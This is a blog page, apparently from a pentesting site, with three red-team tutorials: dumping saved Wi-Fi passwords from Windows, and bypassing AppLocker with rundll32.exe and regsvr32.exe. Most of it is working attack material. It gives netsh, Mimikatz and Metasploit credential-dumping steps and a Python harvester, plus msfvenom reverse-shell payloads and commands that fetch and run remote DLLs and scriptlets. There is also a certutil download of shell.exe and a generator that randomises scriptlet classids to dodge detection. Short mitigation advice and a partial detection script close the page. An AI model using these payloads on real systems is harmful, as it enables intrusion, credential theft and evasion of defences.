Showing posts with label redteam.

Credential Dumping: Wireless


Today we will be taking a look at how to dump wireless credentials from a Windows host: what credential dumping is, where it fits in red teaming, and the different ways to get those pesky Wi-Fi passwords out of a machine you already control.

Table of Contents
·         What is Credential Dumping?
·         Credential Dumping in Real Life
·         Credential Dumping Methods
o   Manual (profile XML)
o   netsh
o   WirelessKeyView
o   Wi-Fi Network Properties
o   LaZagne
o   Mimikatz
o   Metasploit Framework
·         Mitigation

What is Credential Dumping?
In the security world, "password cracking" is often used as a catch-all for every way of attacking, dumping or recovering a target's passwords. This article focuses on one technique: credential dumping.
Credential dumping is the extraction of stored usernames and passwords from a system you already have access to. One compromised machine can yield the credentials of many accounts belonging to its owner: bank and email logins saved in a browser, social media accounts and, the subject of this article, wireless networks.

Credential Dumping in Real Life
Once an attacker has a foothold on the target system, that access can be used to retrieve a whole bunch of stored credentials. For each kind of credential there are several ways to get at it; for wireless networks, every SSID and passphrase the operating system has ever saved can be recovered, and we will cover the common methods here. Whether you do this from an interactive desktop session or through a remote shell depends on how you got in, and that in turn decides which of the methods below is the most convenient.

Credential Dumping Methods
As outlined above, this article walks through the various ways of dumping wireless credentials from a Windows system. So, let's get started, shall we?

Manual Credential Dumping
Every saved Wi-Fi profile is stored as an XML file under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***, one folder per wireless interface. The SSID is saved in clear text, but the passphrase is not: the keyMaterial element holds a DPAPI blob encrypted under the machine's SYSTEM key (the protected element is true). Reading the file therefore only gives you the network names; to recover the passphrase you need the WLAN service, or code running as SYSTEM, to decrypt it, which is why the netsh, Mimikatz and Metasploit methods below need administrative rights.
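To show what a stored profile actually contains, here is a small parser written for this article (it is not code from the original post). It reads a WLAN profile XML, decodes the SSID, and reports whether the key is a DPAPI blob (as in the files under Wlansvc) or a clear-text passphrase (as in a profile exported with netsh wlan export profile key=clear). Both sample profiles below are constructed for the example; the DPAPI key material is a real DPAPI header followed by filler bytes, not a blob taken from a machine.

```python
"""Parse a Windows WLAN profile XML and report what is recoverable from it.

Stored profiles under C:\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\<GUID>\\
keep the SSID in clear text and the passphrase as a DPAPI blob (hex in
<keyMaterial>, <protected>true</protected>). A profile exported with
`netsh wlan export profile key=clear` carries the passphrase itself.
"""
import xml.etree.ElementTree as ET

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# A DPAPI blob starts with version 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} with its fields in little-endian order.
DPAPI_MAGIC = bytes.fromhex("01000000D08C9DDF0115D1118C7A00C04FC297EB")


def _text(root, path):
    el = root.find(path, NS)
    return el.text.strip() if el is not None and el.text else None


def parse_profile(xml_text):
    """Return a dict describing the profile and the state of its stored key."""
    root = ET.fromstring(xml_text)
    ssid = _text(root, "w:SSIDConfig/w:SSID/w:name")
    ssid_hex = _text(root, "w:SSIDConfig/w:SSID/w:hex")
    if ssid is None and ssid_hex:
        ssid = bytes.fromhex(ssid_hex).decode("utf-8", "replace")
    sec = "w:MSM/w:security/"
    info = {
        "profile": _text(root, "w:name"),
        "ssid": ssid,
        "authentication": _text(root, sec + "w:authEncryption/w:authentication"),
        "encryption": _text(root, sec + "w:authEncryption/w:encryption"),
        "key_type": _text(root, sec + "w:sharedKey/w:keyType"),
        "protected": _text(root, sec + "w:sharedKey/w:protected") == "true",
        "key_material": _text(root, sec + "w:sharedKey/w:keyMaterial"),
    }
    km = info["key_material"]
    if km is None:
        info["key_state"] = "none"          # open or 802.1X network: no PSK stored
    elif not info["protected"]:
        info["key_state"] = "cleartext"     # exported with key=clear
    else:
        try:
            blob = bytes.fromhex(km)
        except ValueError:
            blob = b""
        # Only SYSTEM (or the WLAN service on its behalf) can unprotect this blob.
        info["key_state"] = "dpapi" if blob.startswith(DPAPI_MAGIC) else "protected-unknown"
    return info


# Constructed sample: the on-disk form. Key material = DPAPI header + filler bytes.
STORED_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Linuxlab</name>
  <SSIDConfig><SSID><hex>4C696E75786C6162</hex><name>Linuxlab</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType><protected>true</protected>
      <keyMaterial>01000000D08C9DDF0115D1118C7A00C04FC297EB010000001122334455667788</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

# Constructed sample: the exported form (netsh wlan export profile key=clear).
EXPORTED_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Meterpreter</name>
  <SSIDConfig><SSID><hex>4D65746572707265746572</hex></SSID></SSIDConfig>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>Toor1234!</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>"""

if __name__ == "__main__":
    for sample in (STORED_PROFILE, EXPORTED_PROFILE):
        print(parse_profile(sample))
```

Point the parser at a real profile (open the XML as an administrator) and you will see key_state come back as dpapi: the SSID leaks from the file alone, the passphrase does not.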




Credential Dumping using netsh
Netsh (network shell) is a command-line scripting utility shipped with Windows. It can be run from the command prompt or from PowerShell and exposes the configuration of every networking component on the system, including the wireless profiles the machine has ever saved. Its wlan context takes a number of parameters that return different pieces of that information. It works from any shell you have on the target, whether an interactive desktop, a reverse shell or a Meterpreter session; the only requirement is that the shell runs with administrative rights for the step that reveals the key.
To list the SSIDs the device has saved, use the following command:
netsh wlan show profiles



The command lists the names of the Wi-Fi networks the system has connected to in the past or present, such as Meterpreter and Linuxlab in the image above.
To reveal the passphrase of one of the listed SSIDs, ask for the profile with key=clear (quote the name if it contains spaces):
netsh wlan show profile name="<SSID>" key=clear


As shown in the image above, the Key Content line under Security settings holds the passphrase. If that line is missing, the shell was not elevated: netsh silently omits it for non-administrators.
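Typing the second command once per SSID is tedious on a host with dozens of saved networks, so here is a small Python wrapper added for this article (not code from the original post) that runs the two netsh commands and parses their output into one list. The netsh invocation is injectable, so the parsing is exercised below against constructed netsh output; the English field labels are an assumption, and a localized Windows will print different ones.

```python
"""Collect every saved Wi-Fi profile and its passphrase by driving netsh.

The `runner` argument takes an argv list and returns netsh's stdout, so the
parsing can be tested offline with constructed output (below) and run for
real on Windows with `run_netsh`.
"""
import os
import re
import subprocess

# Labels are those of an English Windows build (assumption for this example).
PROFILE_RE = re.compile(r"^\s*(?:All User|Current User) Profile\s*:\s*(.+?)\s*$", re.M)
FIELD_RE = re.compile(r"^\s*(Name|Authentication|Cipher|Security key|Key Content)\s*:\s*(.+?)\s*$", re.M)


def parse_profile_names(text):
    """Names from `netsh wlan show profiles`."""
    return PROFILE_RE.findall(text)


def parse_profile_details(text):
    """Fields from `netsh wlan show profile name=<x> key=clear`."""
    fields = dict(FIELD_RE.findall(text))
    return {
        "name": fields.get("Name"),
        "authentication": fields.get("Authentication"),
        "cipher": fields.get("Cipher"),
        "has_key": fields.get("Security key") == "Present",
        # netsh prints 'Key Content' only when it runs elevated; otherwise the
        # line is simply absent, so None here means "present but not revealed".
        "key": fields.get("Key Content"),
    }


def show_profile_args(name):
    return ["netsh", "wlan", "show", "profile", f"name={name}", "key=clear"]


def run_netsh(args):
    return subprocess.run(args, capture_output=True, text=True, check=False).stdout


def dump_wifi_credentials(runner=run_netsh):
    """Enumerate profiles, then fetch each one with key=clear."""
    results = []
    for name in parse_profile_names(runner(["netsh", "wlan", "show", "profiles"])):
        details = parse_profile_details(runner(show_profile_args(name)))
        if details["name"] is None:
            details["name"] = name
        results.append(details)
    return results


# Constructed netsh output for offline use: one profile revealed, one not.
SAMPLE_PROFILES = """
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Meterpreter
    All User Profile     : Linuxlab
"""

SAMPLE_DETAILS = {
    "Meterpreter": """
Profile Meterpreter on interface Wi-Fi:
=======================================================================

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Meterpreter

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Meterpreter"

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Toor1234!
""",
    "Linuxlab": """
Profile Linuxlab on interface Wi-Fi:
=======================================================================

Profile information
-------------------
    Name                   : Linuxlab

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
""",
}


def fake_runner(args):
    """Stand-in for netsh that serves the constructed output above."""
    if args[3] == "profiles":
        return SAMPLE_PROFILES
    return SAMPLE_DETAILS[args[4].split("=", 1)[1]]


if __name__ == "__main__":
    runner = run_netsh if os.name == "nt" else fake_runner
    for entry in dump_wifi_credentials(runner):
        print(f"{entry['name']:<20} {entry['authentication']!s:<15} key={entry['key']}")
```

On a real host run it from an elevated prompt; a profile whose key comes back as None is the tell-tale of a non-elevated shell, not of a missing key.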

Credential Dumping using WirelessKeyView
WirelessKeyView is a small NirSoft utility that reads the stored wireless profiles and displays the keys in clear text. It was written to recover lost or forgotten Wi-Fi passwords, which makes it handy when you have an interactive desktop on the target. Download it from NirSoft, run it as an administrator, and you get every saved SSID with its password, as shown in the image below. Expect antivirus to flag it as a password-recovery tool, so it is a poor choice where stealth matters.


Credential Dumping using Wi-Fi Network Properties
The next method is purely manual and suits the case where you have been given a desktop session on the network but nobody told you the Wi-Fi password. Go to Control Panel > Network and Internet > Network and Sharing Center and click the Wi-Fi (SSID) link next to the active connection. In the status dialog click Wireless Properties, open the Security tab and tick Show characters; the password is displayed as in the image below. This needs administrative rights, as Windows prompts for elevation before revealing the key.


Credential Dumping using LaZagne
LaZagne is an open-source tool that retrieves all the passwords stored on a machine (browsers, mail clients, Wi-Fi and more). We have covered LaZagne in another article, which you can read here. In our experience it is an excellent credential dumping tool, and it is well suited to the post-exploitation phase of an external engagement where you already have a shell. It has to run on the target itself: upload the binary through your session and invoke its Wi-Fi module:

lazagne.exe wifi




After running the above command, every saved SSID and its passphrase is printed.
Credential Dumping using Mimikatz
Another method, available as soon as you have a Meterpreter session, is Mimikatz through Metasploit's kiwi extension. We have covered the various features of Mimikatz in another article, which you can find here. Escalate to SYSTEM first, because the keys are DPAPI-protected under the SYSTEM account, then load kiwi and list the shared (all-user) wireless profiles:

getsystem
load kiwi
wifi_list_shared


And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework
Our next method uses Metasploit itself to retrieve the passwords. As everyone knows, Metasploit is a framework of ready-made exploits and post-exploitation modules that makes pentesting convenient, and it serves beginners and experts alike.

Metasploit ships a post-exploitation module for exactly this job. Start msfconsole, get a session on the target with whatever exploit you prefer, background the session, and run the module against it (the session needs administrative rights for the keys to be decrypted):

use post/windows/wlan/wlan_profile
set session 1
run


And just as it is shown in the image above, you will have your credentials.

Mitigation
A saved Wi-Fi key is only as safe as the machine that holds it, so most of the countermeasures are about limiting who can read it and how much a leaked key is worth:
·         Keep your employees aware that anyone with administrative access to a laptop can recover every Wi-Fi password it has ever saved.
·         Do not use the default SSID of a wireless network.
·         Do not save the passphrase on machines you do not control (kiosks, shared or unmanaged devices); untick "Connect automatically" and reconnect manually instead.
·         Prefer WPA2/WPA3-Enterprise (802.1X) for corporate networks: each user or device authenticates with its own credential or certificate, so there is no shared pre-shared key to dump.
·         Have a separate network for guests.
·         Treat the Wi-Fi as untrusted and use a VPN for access to internal resources.
·         Change the Wi-Fi passphrase regularly, and immediately after a device is lost, compromised, or leaves the organisation.
·         Change the default management address and administrator password of the access point.
·         Physically secure access points and modems: the reset button restores factory defaults, which on many devices means an open network or a printed default key, and lets anyone connect.
·         Log process command lines (Windows event 4688 with command-line auditing, or Sysmon) and alert on netsh wlan show profile ... key=clear and on the tools listed above.

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!
We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)


The purpose of this post is to demonstrate the most common techniques for bypassing AppLocker application whitelisting with rundll32.exe. For security reasons, system administrators add group policies that restrict which applications a local user can execute. In our previous article, "Windows AppLocker Policy – A Beginner's Guide", we discussed how AppLocker rules define application control policies and how to work with them. Today you will learn how to bypass those policies by having the trusted, signed rundll32.exe load code on your behalf.
Table of Contents
·         Introduction
·         Working of DLL files
·         Advantages
·         Disadvantages
·         Different methods for AppLocker Bypass using DLL files
·         Conclusion
Introduction
DLL files are essential to the working of Windows itself and of most of the programs that run on it. A Dynamic Link Library (DLL) is a file that exports functions for other programs to call, so that many programs can share one copy of the code, even simultaneously. Although a DLL uses the same PE format as an .exe, it has no entry point of its own and is not directly executable: something has to load it, which is exactly what rundll32.exe does. DLL-type files come with several extensions: .dll (Dynamic Link Library), .ocx (ActiveX controls), .cpl (Control Panel applets) and .drv (device drivers).
Working
A program does not need to carry every function it uses; it links to DLLs that are loaded into its address space at run time, and only when the functionality in question is needed, which keeps load time down. Because each library is separate and independent, it can be upgraded without touching the rest of the program. For example, a dictionary program that gets new words every month only needs the updated library, not a whole new install.
Advantages
·         Uses fewer resources
·         Promotes modular architecture
·         Eases deployment and installation
Disadvantages
A program that depends on a DLL can break when:
·         the dependent DLL is upgraded to a new version;
·         the dependent DLL is patched in a way the program did not expect;
·         the dependent DLL is overwritten with an earlier version;
·         the dependent DLL is removed from the computer.
Methods
·         smb_delivery
·         MSFVenom
·         Koadic
·         JSRat
smb_delivery
Our first method uses Metasploit's smb_delivery module, which hosts a malicious DLL on an SMB share and hands you the rundll32 one-liner to load it. Open a terminal in Kali and type the following commands:
msfconsole
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit
When the module starts it prints the command that has to be executed on the victim's PC to get a session. Copy and paste that command into the Run window of the victim's PC, as shown in the image below. rundll32 loads the DLL straight from the UNC path and calls its first export, so nothing is written to disk:
rundll32.exe \\192.168.1.107\ZtmW\test.dll,0
As soon as the command is executed you will have your Meterpreter session. To access it type:
sessions 1
sysinfo
MSFVenom
Our second method is via msfvenom. Generate a Meterpreter payload in DLL form by typing the following command in the Kali terminal:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll
Copy 1.dll to the victim (here it lands in C:\Users\raj\Downloads) and load it through shell32's Control_RunDLL export from the Run window; this route lets rundll32 load a DLL that has no export of its own to name:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll

Before running that, start the multi/handler so there is something to catch the connection:
msfconsole
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Koadic
Our next method uses the Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation toolkit comparable to Meterpreter and PowerShell Empire, except that its agents are JScript/VBScript running under Windows Script Host. To know more about Koadic, read our detailed article on the framework: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run

Running the stager prints a command. Copy the whole command, from rundll32.exe up to and including the closing 6.0"), and paste it into the command prompt of the victim's PC.
Once the command runs you will have your session, as shown in the following image.
To inspect the session type:
zombies 0
Now the dilemma is: what if the command prompt is blocked on the victim's PC?
If cmd.exe is blocked by policy, you can use cmd.dll, a command interpreter compiled as a DLL by Didier Stevens, which you can find on his blog. Download the zip, extract it, and load the DLL from the Run window:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as the command runs you have a working command shell despite the block on cmd.exe, as shown below:
JSRat
Our next rundll32 method uses JSRat, which you can download from GitHub. It is another very small command-and-control framework, in the same spirit as Koadic and PowerShell Empire, that generates payloads specifically for rundll32.exe and regsvr32.exe. JSRat starts a web server and serves the one-liner (and, for regsvr32, the .sct file) from there. To use it type:
./JSRat.py -I 192.168.1.107 -p 4444
Once JSRat is running it prints a link to open in a browser. That page contains the command to execute on the victim's PC.
Open http://192.168.1.107/wtf in your browser; the code is shown as in the image below.
Run that command in the command prompt of the victim's PC:
And voilà, you have a session, as in the image below:

Conclusion
DLL files are collections of code and procedures packaged so that several programs can share them at once, which saves memory and keeps Windows programs running correctly. They are trusted and required by Windows, and rundll32.exe, the signed system binary that loads them, is normally allowed by application whitelisting rules. That is exactly what makes loading your own DLL through it so effective: the methods above are different ways of doing it.

Bypass Application Whitelisting using regsvr32.exe (Multiple Methods)


The purpose of this post is to demonstrate the most common techniques for bypassing AppLocker application whitelisting with regsvr32.exe. For security reasons, system administrators add group policies that restrict which applications a local user can execute. In our previous article, "Windows AppLocker Policy – A Beginner's Guide", we discussed how AppLocker rules define application control policies and how to work with them. Today you will learn how to bypass those policies with regsvr32.exe.
Table of Contents
·         Introduction to regsvr32
·         Working of regsvr32
·         Multiple methods to attack with regsvr32
Introduction
Regsvr32 stands for Microsoft Register Server. It is a Windows command-line utility, found under C:\Windows\System32 (and SysWOW64), and a signed Microsoft system file. Its job is to register and unregister COM servers, which come as DLLs (Dynamic Link Libraries) and OCX files (ActiveX controls), by loading the file and calling its DllRegisterServer or DllUnregisterServer export. It runs in the background without a window and shows up in Task Manager only while it works. Because it is one of Microsoft's trusted binaries, application whitelisting rules normally allow it.
Working
When you register a DLL with regsvr32, the library's registration routine writes information about its COM classes (their CLSIDs and the path to the file) into the registry. Windows and other programs later consult those entries to find the component and call into its executable code without knowing where it lives. This also keeps versions straight: when a component is updated and re-registered, callers automatically pick up the new file. Outside of registering and unregistering DLLs the tool is rarely used, which is what makes its abuse stand out in logs.
Regsvr32.exe has the following command-line options:
Syntax: regsvr32 [/s] [/u] [/n] [/i[:cmdline]] dllname
/u – unregister the server
/i – call DllInstall, passing it the optional cmdline; combined with /u it calls DllInstall for uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – silent; display no message boxes
The attack below combines /s /n /u /i:<URL> scrobj.dll: regsvr32 never registers anything, it just hands the URL to scrobj.dll's DllInstall, which fetches the scriptlet and runs the script inside it.

Multiple Methods
·         Web delivery
·         Empire
·         Manual
·         MSFVenom
·         Koadic
·         JSRat
·         GreatSCT
Web Delivery
Metasploit's web_delivery module quickly fires up a web server that serves a payload and prints the one-liner that downloads and executes it, either through a scripting-language interpreter (Python, PHP, PowerShell) or, for the Regsvr target, through the "squiblydoo" technique via regsvr32.exe to bypass application whitelisting. The module's purpose is to establish a session quickly when the attacker has to type a command in by hand, for example through command injection.
Squiblydoo abuses the signed Microsoft binary regsvr32 to request a .sct scriptlet file over HTTP and execute the PowerShell command embedded in it. Both web requests (the .sct file and the PowerShell download/execute) can occur on the same port. The "PSH (Binary)" target instead writes a file to disk, allowing custom binaries to be served and executed.
Set the Regsvr target (3) and a Windows payload, since the scriptlet ends up running PowerShell on the victim:
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

Copy the command that the module prints (highlighted in the screenshot below):

Once the exploit is running, the module hands you a ready-made regsvr32 command. Run it in the command prompt of the victim's PC, as shown below:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

When you hit enter, you will have your session. Type sysinfo for information about the PC, as shown in the image below:



PowerShell Empire
For our next regsvr32 method we will use Empire, a post-exploitation framework. So far we have paired our .sct attacks with Metasploit; this time the scriptlet will carry an Empire launcher instead. Empire is a Python-based framework with a pure PowerShell Windows agent, which makes it very useful on Windows targets. It was developed by @harmj0y, @sixdub, @enigma0x3, @rvrsh3ll, @killswitch_gui and @xorrior, and you can download it from https://github.com/EmpireProject/Empire.
For a basic guide to Empire, see our introductory article: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once Empire is started, type listeners to check whether any listeners are active. As you can see in the image below there are none, so set one up by typing:
uselistener http
execute
With the above commands you have an active HTTP listener. Type back to leave the listener menu so you can build the stager.

Now you need a stager. In Empire, a stager is the small piece of code that runs on the compromised host and pulls down the agent, so this is how our malicious file is created. Type:
usestager windows/launcher_sct
set Listener http
execute
After execute, the stager writes launcher.sct to /tmp. To serve it, start a Python web server (from / so that the /tmp/ path in the URL below resolves):
python -m SimpleHTTPServer 8080
With the server up, the only step left is to execute the scriptlet on the victim's PC. Type the following in its command prompt:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
We used port 8080 because that is where the Python server is listening.

Once the command runs you will receive an agent. To interact with it type:
interact 9ATUX4M7
Here 9ATUX4M7 is the agent name; it varies from session to session.
Inject PowerShell code in sct File (Manual Method)
Our next method is manual, with a little help from a Metasploit module to produce the PowerShell one-liner. First generate the PowerShell command: in the Kali terminal, use web_delivery with the PSH target (2) and a Windows payload:
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

When the module starts it prints the PowerShell command on the terminal. Copy the highlighted text shown below:

Now we need a .sct file to carry that command. We found a scriptlet template online, which you can access by clicking here; it is a COM scriptlet whose registration block runs a JScript one-liner that launches calc.exe through WScript.Shell. The script is shown in the image below:

Paste the PowerShell command generated by web_delivery into the template where it says "calc.exe", as shown in the image below, and save the file with a .sct extension. Serve it over HTTP (port 80 here) as in the previous method.

Then run the .sct file through regsvr32.exe on the victim's PC:
regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll

As soon as the command executes, web_delivery hands you a session. To access it type sessions 1, then sysinfo for basic information about the system.


MsfVenom
Our next method uses msfvenom and two scriptlets: one to download our malware, another to execute it. First generate the executable:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Start the Python web server in the directory that holds shell.exe:
python -m SimpleHTTPServer 80

Then take the same scriptlet template used in the previous method and, in place of "calc.exe", put a certutil command that fetches shell.exe from our server:
"certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe"
certutil is used because it is a signed Windows binary that can download a file. Save this as 3.sct.

Now run the scriptlet on the victim with the following command (the file lands in the directory the command runs from, C:\Users\raj here):
regsvr32 /u /n /s /i:http://192.168.1.109/3.sct scrobj.dll

Next, create a second scriptlet to execute the downloaded shell.exe. Take the template again and where it says "calc.exe" write:
"cmd /k cd c:\Users\raj & shell.exe"

Save this one as 4.sct and run it the same way:
regsvr32 /u /n /s /i:http://192.168.1.109/4.sct scrobj.dll

Alongside this, start the multi/handler to catch the connection:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
After the second scriptlet runs on the victim's PC, you will have a Meterpreter session.
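Both the manual method and the msfvenom method above edit the same scriptlet template by hand, swapping "calc.exe" for a longer command. That step is where things usually break: a Windows path contains backslashes, the PowerShell one-liner contains double quotes, and either will end the JScript string early. The generator below is added for this article (it is not the script the original post found online): it produces a scriptlet of the same shape, escapes the command for both the JScript string and the CDATA section, and, unless you pass one, uses a fresh random classid rather than the fixed GUID from the public proof of concept that detection rules tend to key on. The progid name and the lowercase xml declaration are choices made for this example.

```python
"""Generate a COM scriptlet (.sct) of the kind regsvr32 /i:<url> scrobj.dll executes.

scrobj.dll "registers" the scriptlet by running the JScript in its
<registration> block; that JScript launches a command via WScript.Shell.
"""
import uuid
import xml.etree.ElementTree as ET

# Same structure as the public scriptlet PoC; progid/classid are arbitrary.
TEMPLATE = """<?xml version="1.0"?>
<scriptlet>
<registration progid="{progid}" classid="{{{classid}}}">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("{command}");
]]>
</script>
</registration>
</scriptlet>
"""


def js_string(s):
    """Escape a command so it survives as a JScript string literal inside CDATA."""
    out = s.replace("\\", "\\\\").replace('"', '\\"')
    # A literal ']]>' would close the CDATA section; ']]\x3e' is the same text to JScript.
    return out.replace("]]>", "]]\\x3e")


def build_scriptlet(command, progid="Scriptlet", classid=None):
    """Return the .sct text that runs `command` when regsvr32 installs it."""
    classid = classid or str(uuid.uuid4()).upper()   # fresh GUID per file
    return TEMPLATE.format(progid=progid, classid=classid, command=js_string(command))


def is_well_formed(sct_text):
    """scrobj.dll parses the file as XML first, so a malformed file silently does nothing."""
    try:
        root = ET.fromstring(sct_text)
    except ET.ParseError:
        return False
    return root.tag == "scriptlet" and root.find("registration/script") is not None


if __name__ == "__main__":
    # The two commands the article pastes into the template by hand.
    print(build_scriptlet("certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe"))
    print(build_scriptlet(r"cmd /k cd c:\Users\raj & shell.exe"))
```

Write the output to 3.sct and 4.sct, serve them as described above, and the regsvr32 commands are unchanged. Note that the regsvr32 invocation itself is what a defender sees in process logs; changing the classid only removes one file-content signature.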


Koadic
Our next method uses Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation toolkit comparable to Meterpreter and PowerShell Empire, with agents written in JScript/VBScript. To know more about Koadic, read our detailed article on the framework: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/regsvr
set srvhost 192.168.1.107
run

The stager prints the command to use. Type it in the command prompt of the victim's PC:
regsvr32 /u /n /s /i:http://192.168.1.107:9998/uWBjv scrobj.dll
Once the command runs you have a session. To inspect it type:
zombies 0


JSRat
Our next regsvr32 method uses JSRat, which you can download from GitHub. It is another very small command-and-control framework, in the same spirit as Koadic and PowerShell Empire, that generates payloads specifically for rundll32.exe and regsvr32.exe. JSRat starts a web server and serves the .sct file from there. To use it type:
./JSRat.py -I 192.168.1.107 -p 4444

Running the above command starts the web server.

Open its page in your browser as shown below; there you will find the regsvr32 command that fetches the .sct file, which you need to run on the victim's PC.

Run the command in the Run window, as shown in the image below:

After executing it you will have a session, as shown:


GreatSCT
GreatSCT is a tool that wraps Metasploit payloads in application-whitelisting bypass techniques (regsvr32, installutil, msbuild and others) and aims to get them past most antivirus products. It is currently maintained by @ConsciousHacker and you can download it from https://github.com/GreatSCT/GreatSCT
Once it is downloaded and running, type the following command to access the bypass modules:
use Bypass

Then type list to see the available modules.

The list of modules appears as shown in the image below:

From the list choose the regsvr32 shellcode-injection module and generate a payload:
use regsvr/shellcode_inject/base64_migrate.py
generate

When prompted for a shellcode source, type 1 to choose msfvenom.

It then asks for a payload. Just press enter to accept the default, windows/meterpreter/reverse_tcp, which is the one we need. Provide the LHOST (192.168.1.107 here) and any LPORT; in the image below we used 2345.

Next it asks for a name for the payload. By default it uses "payload", so either give a name or press enter to accept the default.

Press enter and it generates two files: a Metasploit resource file for the handler and the .sct file itself.

Now start the Python web server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80

Run the .sct file through regsvr32 from the Run window of the victim's PC as shown below.

At the same time start the multi/handler from the generated resource file:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And you have a Meterpreter session.


Conclusion
Getting a session through regsvr32 is an unusual route, but an important one: the binary is signed by Microsoft, lives in System32 and is allowed by default whitelisting rules, so it carries your scriptlet past the policy that would block an executable of your own. The methods above use different tools to build and deliver that scriptlet.
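The three posts on this page share one defensive angle: every technique leaves a distinctive process command line behind. The script below is added here as an example (it is not part of any of the original posts) of detection logic for netsh key=clear, rundll32 loading a DLL from a share or a user directory (including the shell32 Control_RunDLL route), regsvr32 squiblydoo, and certutil downloads. It assumes you can feed it the full command line of each new process, as Security event 4688 with command-line auditing or Sysmon Event 1 provide; the events it runs over are constructed from the commands used in the posts.

```python
"""Flag the command lines behind the techniques on this page in process-creation logs.

Input: (host, user, cmdline) tuples from any process-creation source
(Security 4688 with command-line auditing, Sysmon Event 1, EDR telemetry).
"""
import re

# Each rule is (tag, regex). Matching is case-insensitive and anchored on the
# image name, so an argument that merely contains the word does not fire.
RULES = [
    # netsh asked to print a stored Wi-Fi passphrase in clear text.
    ("netsh_wlan_key_clear",
     re.compile(r"\bnetsh(?:\.exe)?\b.*\bwlan\b.*\bkey\s*=\s*clear\b", re.I)),
    # Squiblydoo: regsvr32 fetching a scriptlet over HTTP(S) or loading scrobj.dll.
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*(?:/i:\s*\S*https?://|\bscrobj\.dll\b)", re.I)),
    # rundll32 loading a DLL from a UNC share or from under \Users\.
    ("rundll32_untrusted_dll",
     re.compile(r"\brundll32(?:\.exe)?\b\s+(?:\\\\[^\s,]+|\S*\\users\\[^\s,]+)\.dll\b", re.I)),
    # shell32!Control_RunDLL pointed at a file outside the Windows directory.
    ("rundll32_control_rundll",
     re.compile(r"\brundll32(?:\.exe)?\b.*shell32\.dll\s*,\s*Control_RunDLL\s+(?!\S*\\windows\\)\S+", re.I)),
    # certutil used as a downloader.
    ("certutil_download",
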